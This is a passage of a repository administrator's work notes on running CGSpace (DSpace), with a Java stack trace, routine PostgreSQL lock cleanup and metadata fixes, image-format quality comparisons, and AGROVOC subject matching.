at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:326)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy198.generate(Unknown Source)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.processXMLPipeline(AbstractProcessingPipeline.java:544)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:273)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:439)
at sun.reflect.GeneratedMethodAccessor255.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.treeprocessor.sitemap.SerializeNode.invoke(SerializeNode.java:147)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:55)
at org.apache.cocoon.components.treeprocessor.sitemap.MatchNode.invoke(MatchNode.java:87)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.components.treeprocessor.sitemap.MountNode.invoke(MountNode.java:117)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelineNode.invoke(PipelineNode.java:143)
at org.apache.cocoon.components.treeprocessor.AbstractParentProcessingNode.invokeNodes(AbstractParentProcessingNode.java:78)
at org.apache.cocoon.components.treeprocessor.sitemap.PipelinesNode.invoke(PipelinesNode.java:81)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:239)
at org.apache.cocoon.components.treeprocessor.ConcreteTreeProcessor.process(ConcreteTreeProcessor.java:171)
at org.apache.cocoon.components.treeprocessor.TreeProcessor.process(TreeProcessor.java:247)
at org.apache.cocoon.servlet.RequestProcessor.process(RequestProcessor.java:351)
at org.apache.cocoon.servlet.RequestProcessor.service(RequestProcessor.java:169)
at org.apache.cocoon.sitemap.SitemapServlet.service(SitemapServlet.java:84)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:468)
at org.apache.cocoon.servletservice.ServletServiceContext$PathDispatcher.forward(ServletServiceContext.java:443)
at org.apache.cocoon.servletservice.spring.ServletFactoryBean$ServiceInterceptor.invoke(ServletFactoryBean.java:264)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:172)
at org.springframework.aop.framework.JdkDynamicAopProxy.invoke(JdkDynamicAopProxy.java:204)
at com.sun.proxy.$Proxy186.service(Unknown Source)
at org.dspace.springmvc.CocoonView.render(CocoonView.java:113)
at org.springframework.web.servlet.DispatcherServlet.render(DispatcherServlet.java:1216)
at org.springframework.web.servlet.DispatcherServlet.processDispatchResult(DispatcherServlet.java:1001)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:945)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:867)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:951)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:853)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:647)
at org.springframework.web.servlet.FrameworkServlet.service(FrameworkServlet.java:827)
at javax.servlet.http.HttpServlet.service(HttpServlet.java:728)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:303)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.SetCharacterEncodingFilter.doFilter(SetCharacterEncodingFilter.java:113)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.DSpaceCocoonServletFilter.doFilter(DSpaceCocoonServletFilter.java:160)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.app.xmlui.cocoon.servlet.multipart.DSpaceMultipartFilter.doFilter(DSpaceMultipartFilter.java:119)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:52)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.dspace.utils.servlet.DSpaceWebappServletFilter.doFilter(DSpaceWebappServletFilter.java:78)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:241)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:219)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:110)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:492)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:165)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:104)
at org.apache.catalina.valves.CrawlerSessionManagerValve.invoke(CrawlerSessionManagerValve.java:235)
at org.apache.catalina.valves.AccessLogValve.invoke(AccessLogValve.java:1025)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:116)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:451)
at org.apache.coyote.http11.AbstractHttp11Processor.process(AbstractHttp11Processor.java:1201)
at org.apache.coyote.AbstractProtocol$AbstractConnectionHandler.process(AbstractProtocol.java:654)
at org.apache.tomcat.util.net.JIoEndpoint$SocketProcessor.run(JIoEndpoint.java:317)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:750)
```
- I don't see anything on the DSpace issue tracker or mailing list so I asked about it on the DSpace Slack...
- Peter said CGSpace was slow and I see a lot of locks from the XMLUI
- I looked and found many locks that were many hours and days old so I killed some:
```console
$ psql < locks-age.sql | grep -E "[[:digit:]] days" | awk -F\| '{print $10}' | sort -u
1050672
1053773
1054602
1054702
1056782
1057629
1057630
$ psql < locks-age.sql | grep -E "[[:digit:]] days" | awk -F\| '{print $10}' | sort -u | xargs kill
```
- I'm also running a `dspace cleanup -v`, but it doesn't seem to be finishing
- I recall something like there being errors in the logs rather than on the command line in DSpace 6...
- I found it in the DSpace log:
```console
2023-04-17 21:09:46,004 ERROR org.hibernate.engine.jdbc.spi.SqlExceptionHelper @ ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
Detail: Key (uuid)=(a7ddf477-1c04-4de0-9c7a-4d3c84a875bc) is still referenced from table "bundle".
```
- If I mark the primary bitstream as null manually the cleanup script continues until it finds a few more
- I ended up with a long list of UUIDs to fix before the script would complete:
```console
$ psql -d dspace -c "update bundle set primary_bitstream_id=NULL where primary_bitstream_id in ('a7ddf477-1c04-4de0-9c7a-4d3c84a875bc', '9582b661-9c2d-4c86-be22-c3b0942b646a', '210a4d5d-3af9-46f0-84cc-682dd1431762', '51115f07-0a60-4988-8536-b9ebd2a5e15e', '0fc5021d-3264-413a-b2e2-74bda38a394e', '4704fa62-b8ab-4dfe-b7aa-0e4905f8412a')"
```
- This process ended up taking a few days because each iteration ran for over four hours before failing on the next UUID, sighhhhh
## 2023-04-18
- Regarding the item Abenet noticed yesterday that has a blank page and a nullPointerException
- It appears OK on DSpace Test! https://dspacetest.cgiar.org/handle/10568/75611
- And according to the REST API on CGSpace the item was modified on 2023-04-11, so last week...
- According to the DSpace logs it was Francesca who edited the item last week, so I asked her for more information before I troubleshoot more
## 2023-04-19
- I fixed the Bioversity item by deleting the `9781138781276.jpg` bitstream via the REST API
- I *think* Francesca might have changed the "format" of it?
- Anyway, this item has a PDF so we have a proper thumbnail and don't need that other journal cover one
- I noticed a URL for this [Bioversity item](https://hdl.handle.net/10568/89049) redirects incorrectly
- I had mentioned this to Maria and Francesca a few months ago but it seems to never have been resolved
- The `dspace cleanup -v` finally finished after a few days of running and stopping...
- I decided to update the thumbnails in the Bioversity books collection because I saw a few old ones suffering from the CropBox issue
- Also, all day there's been a high load on CGSpace, with lots of locks in PostgreSQL
- I had been waiting until the bitstream cleanup finished... now I might need to restart PostgreSQL to kill some old locks as something needs to give
- I restarted PostgreSQL, but DSpace was still hanging on simple XMLUI options so I ended up restarting Tomcat
- Tag 544 ORCID identifiers with my script
- I updated my `generation-loss.sh` and `improved-dspace-thumbnails` scripts to include thirty-five PDFs from CGSpace (up from twenty-four) to get a larger sample
- Now starting to get some numbers comparing JPEG, WebP, and AVIF
- First, out of curiousity, I checked the average ssimulacra2 scores at Q75, Q80, and Q92 for each format:
| | Q75 | Q80 | Q92 |
|------|-----|-----|-----|
| JPEG | 71 | 74 | 88 |
| WebP | 74 | 77 | 82 |
| AVIF | 82 | 83 | 86 |
- Then I checked the quality and file size (bytes) needed to hit an average ssimulacra2 score of 80 with each format:
- **JPEG**: Q89, 124923 bytes
- **WebP**: Q86, 84662 bytes (33% smaller than JPEG size)
- **AVIF**: Q65, 67597 bytes (56% smaller than JPEG size)
- [Google's original WebP study](https://developers.google.com/speed/webp/docs/webp_study) uses this technique to compare WebP to JPEG too
- As the quality settings are not comparable between formats, we need to compare the formats at matching perceptual scores (ssimulacra2 in this case)
- I used a ssimulacra2 score of 80 because that's the about the highest score I see with WebP using my samples, though JPEG and AVIF do go higher
- Also, according to current ssimulacra2 (v2.1), a score of 70 is "high quality" and a score of 90 is "very high quality", so 80 should be reasonably high enough...
- Here is a plot of the qualities and ssimulacra2 scores:
![Quality vs Score](/cgspace-notes/2023/04/quality-vs-score-ssimulacra-v2.1.png)
- Export CGSpace to check for missing Initiatives mappings
## 2023-04-22
- Export the Initiatives collection to run it through csv-metadata-quality
- I wanted to make sure all the Initiatives items had correct regions
- I had to manually fix a few license identifiers and ISSNs
- Also, I found a few items submitted by MEL that had dates in DD/MM/YYYY format, so I sent them to Salem for him to investigate
- Start a harvest on AReS
## 2023-04-26
- Begin working on the list of non-AGROVOC CGSpace subjects for FAO
- The last time I did this was in 2022-06
- I used the following SQL query to dump values from all subject fields, lower case them, and group by counts:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119) GROUP BY "subject" ORDER BY count DESC) to /tmp/2023-04-26-cgspace-subjects.csv WITH CSV HEADER;
COPY 26315
Time: 2761.981 ms (00:02.762)
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2023-04-26-cgspace-subjects.csv | sed '1d' > /tmp/2023-04-26-cgspace-subjects.txt
$ ./ilri/agrovoc_lookup.py -i /tmp/2023-04-26-cgspace-subjects.txt -o /tmp/2023-04-26-cgspace-subjects-results.csv
```
## 2023-04-27
- The AGROVOC lookup from yesterday finished, so I extracted all terms that did not match and joined them with the original CSV so I can see the counts:
- (I also note that the `agrovoc_lookup.py` script didn't seem to be caching properly, as it had to look up everything again the next time I ran it despite the requests cache being 174MB!)
```console
csvgrep -c 'number of matches' -r '^0$' /tmp/2023-04-26-cgspace-subjects-results.csv \
| csvcut -c subject \
| csvjoin -c subject /tmp/2023-04-26-cgspace-subjects.csv - \
> /tmp/2023-04-26-cgspace-non-agrovoc.csv
```
- I filtered for only those terms that had counts larger than fifty
- I also removed terms like "forages", "policy", "pests and diseases" because those exist as singular or separate terms in AGROVOC
- I also removed ambiguous terms like "cocoa", "diversity", "resistance" etc because there are various other preferred terms for those in AGROVOC
- I also removed spelling mistakes like "modeling" and "savanas" because those exist in their correct form in AGROVOC
- I also removed internal CGIAR terms like "tac", "crp", "internal review" etc (note: these are mostly from CGIAR System Office's subjects... perhaps I exclude those next time?)
- I note that many of *our* terms would match if they were singular, plural, or split up into separate terms, so perhaps we should pair this with an excercise to review our own terms
- I couldn't finish the work locally yet so I uploaded my list to Google Docs to continue later
## 2023-04-28
- The ImageMagick CMYK issue is bothering me still
- I am on a plane currently, but I have a Docker image of ImageMagick 7.1.1-3 and I compared the output of all CMYK PDFs using the same command on my local machine
- The images from the Docker environment are correct with *only* `-colorspace sRGB` (no profiles!) as the commenters on GitHub said
- This leads me to believe something wrong in my own environment, perhaps Ghostscript...?
- The container has Ghostscript 9.53.3~dfsg-7+deb11u2 from Debian 11, while my Arch Linux system has Ghostscript 10.01.1-1
<!-- vim: set sw=2 ts=2: -->

197
content/posts/2023-05.md Normal file
View File

@ -0,0 +1,197 @@
---
title: "May, 2023"
date: 2023-05-03T08:53:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-05-03
- Alliance's TIP team emailed me to ask about issues authenticating on CGSpace
- It seems their password expired, which is annoying
- I continued looking at the CGSpace subjects for the FAO / AGROVOC exercise that I started last week
- There are many of our subjects that would match if they added a "-" like "high yielding varieties" or used singular...
- Also I found at least two spelling mistakes, for example "decison support systems", which would match if it was spelled correctly
- Work on cleaning, proofing, and uploading twenty-seven records for IFPRI to CGSpace
<!--more-->
- I notice there are a few dozen locks from the `dspaceWeb` pool that are five days old on CGSpace so I killed them
```console
$ psql < locks-age.sql | grep " days " | awk -F"|" '{print $10}' | sort -u | xargs kill
```
